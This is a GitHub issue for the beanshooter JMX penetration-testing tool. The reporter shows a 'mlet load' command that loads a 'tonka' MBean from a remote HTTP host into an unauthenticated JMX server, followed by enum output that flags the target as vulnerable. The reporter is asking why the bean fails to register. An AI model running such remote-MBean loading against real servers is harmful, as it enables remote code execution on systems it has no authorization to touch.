Open
Description
Hello,
One more tiny issue that I noticed in recent testing: in many cases, the attempt to load a tonka bean will result in a plain mlet.
The command that is used to load the tonka is either from an mlet request or from deploy, for example:
root@system:~/tools/rmi/remote-method-guesser# java2 -jar ../beanshooter/beanshooter-4.1.0-jar-with-dependencies.jar mlet load xx.xx.xx.xx 12340 tonka http://aa.bb.cc.dd
[+] Loading MBean from http://aa.bb.cc.dd
[+]
[+] MBean was loaded successfully.
root@system:~/tools/rmi/remote-method-guesser# java2 -jar ../beanshooter/beanshooter-4.1.0-jar-with-dependencies.jar enum xx.xx.xx.xx 12340
[+] Checking available bound names:
[+]
[+] * jmxrmi (JMX endpoint: xx.xx.xx.xx:45277)
[+]
[+] Checking for unauthorized access:
[+]
[+] - Remote MBean server does not require authentication.
[+] Vulnerability Status: Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+] - Remote MBeanServer accepted the payload class.
[+] Configuration Status: Non Default
[+]
[+] Checking available MBeans:
[+]
[+] - 32 MBeans are currently registred on the MBean server.
[+] Listing 15 non default MBeans:
[+] - org.apache.logging.log4j.core.jmx.LoggerContextAdmin (org.apache.logging.log4j2:type=397577f9)
[+] - oracle.ucp.admin.JDBCUniversalConnectionPoolMBeanImpl (oracle.ucp.admin.UniversalConnectionPoolMBean:name=UniversalConnectionPoolManager-2800480111575401019-2-amdux113)
[+] - org.apache.logging.log4j.core.jmx.StatusLoggerAdmin (org.apache.logging.log4j2:type=397577f9,component=StatusLogger)
[+] - javax.management.loading.MLet (DefaultDomain:type=MLet) (action: mlet) <--
[+] - org.apache.logging.log4j.core.jmx.LoggerConfigAdmin (org.apache.logging.log4j2:type=397577f9,component=Loggers,name=)
[+] - org.apache.logging.log4j.core.jmx.AppenderAdmin (org.apache.logging.log4j2:type=397577f9,component=Appenders,name=error)
[+] - com.sun.management.UnixOperatingSystem (java.lang:type=OperatingSystem)
[+] - oracle.ucp.admin.UniversalConnectionPoolManagerMBean (oracle.ucp.admin:name=UniversalConnectionPoolManagerMBean)
[+] - sun.management.HotSpotDiagnostic (com.sun.management:type=HotSpotDiagnostic) (action: hotspot)
[+] - oracle.jdbc.driver.OracleDiagnosabilityMBean (com.oracle.jdbc:type=diagnosability,name=sun.misc.Launcher$AppClassLoader@397577f9)
[+] - org.apache.logging.log4j.core.jmx.AppenderAdmin (org.apache.logging.log4j2:type=397577f9,component=Appenders,name=console)
[+] - batchManager.BatchManager (BatchManager:name=BatchManagerInfo)
[+] - org.apache.logging.log4j.core.jmx.AppenderAdmin (org.apache.logging.log4j2:type=397577f9,component=Appenders,name=info)
[+] - org.apache.logging.log4j.core.jmx.ContextSelectorAdmin (org.apache.logging.log4j2:type=397577f9,component=ContextSelector)
[+] - org.apache.logging.log4j.core.jmx.AppenderAdmin (org.apache.logging.log4j2:type=397577f9,component=Appenders,name=warn)
The MLet MBean was not previously registered in the environment, but I would have expected the tonka bean to load. Is it something that I'm performing in the wrong order, maybe?
Regards,
Nicolas